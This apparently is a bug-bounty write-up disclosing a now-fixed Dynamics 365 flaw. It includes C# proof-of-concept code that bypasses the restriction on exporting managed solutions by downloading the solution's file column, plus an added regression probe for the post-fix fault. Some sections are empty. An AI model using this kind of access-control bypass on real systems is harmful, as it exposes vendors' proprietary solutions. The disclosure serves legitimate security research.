Microsoft runs its own Bug Bounty Programs, which cover various products and technologies such as .NET, Azure, AI, M365, D365 and others.
This post is about the Microsoft Dynamics 365 and Power Platform Bounty Program. The program page describes it as follows: Microsoft invites individuals or organizations to identify security vulnerabilities in targeted Dynamics 365 and Power Platform applications and share them with our team. Qualified submissions are eligible for bounty rewards of $500 to $20,000 USD.
# Vulnerability Description
To follow this article, you should have a basic understanding of solutions in Microsoft Power Platform & Dynamics 365. If you have no experience with Dynamics 365, that's okay: a description and links to the documentation follow.
Solutions are how customizers and developers author, package, and maintain units of software that extend Dynamics 365 for Customer Engagement. There are two types of Dynamics 365 Customer Engagement solutions: managed and unmanaged. A managed solution is a completed solution that is intended to be distributed and installed. An unmanaged solution is one that is still under development or isn't intended to be distributed. (See the documentation page "Introduction to solutions".)
The documentation page "Solution Layers" contains a diagram that introduces how managed and unmanaged solutions interact with the system solution to control application behavior.
My vulnerability is related to managed solutions. After you install a managed solution, the following applies:
- You can't add or remove solution components in a managed solution.
- You can't export a managed solution.
- Deleting a managed solution uninstalls all the solution components in it.
Let's focus on the second point: you can't export a managed solution. That means you can't download its content as a .zip archive. In fact, if you try to add managed components to an unmanaged solution and then export it, all managed components disappear from the exported solution. Why doesn't Microsoft allow this? In my opinion, there are two reasons:
The first is that it would let us see and obtain all updates from Microsoft that were delivered through the solution mechanism. You might think that you can open the solution in Power Apps and see all its components, but you can only see the components that Microsoft allows you to see.
The second is that it would let us obtain customizations that have been installed by third-party companies. In that case, the customizations could be uploaded elsewhere, modified, and then used by someone else.
# Solution Storage
As a Dynamics 365 developer, I install solutions quite often. One day I asked myself: what happens after a solution is installed, and where is it stored? To find the answer, let's look at the Solution table/entity reference in the documentation.
There we find the "Fileid" column, which is documented as the file id for the blob URL used for file storage.
Interestingly, this column cannot be queried through SQL. Lookup columns (many-to-one relationships) normally return the GUID of the related record.
This is because it is a "File Column". File columns are different from the other system columns that can store binary data because you can't directly set the values in a create or update operation, or retrieve the file data with the record. You must use the special methods to create, retrieve, update, or delete binary data for file columns. (See the documentation page "Use file column data".)
When a file column is created for a table, a new one-to-many relationship is created between the table and the FileAttachment table. The name of the relationship is {table logical name}_FileAttachments. For example, if the file column is part of the account table, the relationship name will be account_FileAttachments. To make it even more confusing, the name of the solution table's relationship differs from the naming in the documentation (you can see it in SQL Server as a foreign key).
Also in Power Apps you can see the following (N:1) relationship, which is essentially a Lookup column.
When you import a solution into the environment, the fileattachment record is created behind the scenes.
So, to answer the question: the solution metadata is stored in the solution and fileattachment tables (database storage), and the solution content (the .zip archive) is stored in file storage.
# Bypass restriction for exporting Managed Solutions
Below are instructions and C# code that demonstrate the bypass. The code is executed through IOrganizationService.
# Proof of Concept
Follow these steps:
- Go to make.powerapps.com in your organization.
- Open Solutions and select "Managed".
- Select the solution you want to export and copy the solution id from the URL.
- Execute the following code. You can run it from a console application using "PowerPlatform.Dataverse.Client" or write a plugin. Note that if you use a plugin, you have to save the solution somewhere other than the local machine.
# Code
```csharp
using System;
using System.IO;
using Microsoft.Crm.Sdk.Messages;
using Microsoft.PowerPlatform.Dataverse.Client;
using Microsoft.Xrm.Sdk;

namespace ExportSolution
{
    internal class Program
    {
        private static void Main(string[] args)
        {
            // ServiceClient implements IOrganizationService.
            using (var service = new ServiceClient("<Connection string to Dataverse Instance>"))
            {
                ExportManagedSolution(service, "solution", new Guid("<Solution Id>"), "fileid");
            }
        }

        public static void ExportManagedSolution(IOrganizationService service, string solutionName, Guid recordGuid, string fileAttributeName)
        {
            // Step 1: initialize the download of the file column and obtain a continuation token.
            var initializeFileBlocksDownloadRequest = new InitializeFileBlocksDownloadRequest
            {
                Target = new EntityReference(solutionName, recordGuid),
                FileAttributeName = fileAttributeName
            };
            var initializeFileBlocksDownloadResponse = (InitializeFileBlocksDownloadResponse)
                service.Execute(initializeFileBlocksDownloadRequest);

            // Step 2: download the file block by block. A single DownloadBlock call returns only
            // one block, so loop until FileSizeInBytes has been read.
            long fileSize = initializeFileBlocksDownloadResponse.FileSizeInBytes;
            const long blockLength = 4 * 1024 * 1024;
            var fileBytes = new byte[fileSize];
            long offset = 0;
            while (offset < fileSize)
            {
                var downloadBlockRequest = new DownloadBlockRequest
                {
                    FileContinuationToken = initializeFileBlocksDownloadResponse.FileContinuationToken,
                    Offset = offset,
                    BlockLength = Math.Min(blockLength, fileSize - offset)
                };
                var downloadBlockResponse = (DownloadBlockResponse)service.Execute(downloadBlockRequest);
                Array.Copy(downloadBlockResponse.Data, 0, fileBytes, offset, downloadBlockResponse.Data.Length);
                offset += downloadBlockResponse.Data.Length;
            }

            // Step 3: write the solution .zip archive under the file name returned by the server.
            File.WriteAllBytes(initializeFileBlocksDownloadResponse.FileName, fileBytes);
        }
    }
}
```
# Exploiting the Vulnerability
# Response from Microsoft
I reported this behavior to the Microsoft Security Response Center. After two weeks of reviewing my report, I received the following email:
Bounty Award depends on the impact and severity of the vulnerability, and the quality of the submission. Microsoft determines the degree of reward as follows:
My case has the following assessment:
- Severity: Important
- Security Impact: Elevation of Privilege
- Report Quality: High
For more information, please visit the Microsoft Dynamics 365 and Power Platform Bounty Program page.
# Vulnerability was Fixed
Now, if you try to reproduce the steps described above, the program fails with the following exception:

```text
System.ServiceModel.FaultException`1 HResult=0x80131500
Message=External users are restricted from accessing files in solution and fileid
Source=Microsoft.PowerPlatform.Dataverse.Client
```
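The following is an added example, not the code from the original post or from Microsoft: a small regression check that issues only the InitializeFileBlocksDownload step against a managed solution's "fileid" column and reports whether the environment returns the restriction fault shown above. The connection string, the solution id and the class and method names are placeholders.

```csharp
using System;
using System.ServiceModel;
using Microsoft.Crm.Sdk.Messages;
using Microsoft.PowerPlatform.Dataverse.Client;
using Microsoft.Xrm.Sdk;

namespace ManagedSolutionExportCheck
{
    // Hypothetical helper (not part of the original post): probes whether the environment
    // still allows file-block downloads of the solution table's "fileid" file column.
    internal static class ExportRestrictionProbe
    {
        public enum ProbeResult { Restricted, Downloadable, OtherFault }

        public static ProbeResult Probe(IOrganizationService service, Guid solutionId)
        {
            var init = new InitializeFileBlocksDownloadRequest
            {
                Target = new EntityReference("solution", solutionId),
                FileAttributeName = "fileid"
            };
            try
            {
                // Only the initialize step is issued; no blocks are downloaded or written.
                service.Execute(init);
                return ProbeResult.Downloadable;   // the restriction is not enforced here
            }
            catch (FaultException<OrganizationServiceFault> ex)
                when (ex.Message.Contains("External users are restricted"))
            {
                return ProbeResult.Restricted;     // the post-fix behaviour described above
            }
            catch (FaultException<OrganizationServiceFault>)
            {
                return ProbeResult.OtherFault;     // e.g. missing privilege or unknown record
            }
        }

        private static void Main(string[] args)
        {
            // Placeholders: replace with a real connection string and a managed solution id.
            using (var service = new ServiceClient("<Connection string to Dataverse Instance>"))
            {
                var result = Probe(service, new Guid("<Solution Id>"));
                Console.WriteLine($"Managed solution export restriction: {result}");
            }
        }
    }
}
```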
# Acknowledgements
The Microsoft Security Response Center (MSRC) is pleased to recognize the security researchers who have helped make Microsoft online services safer by finding and reporting security vulnerabilities. Each name listed represents an individual or company who has privately disclosed one or more security vulnerabilities in our online services and worked with us to remediate the issue.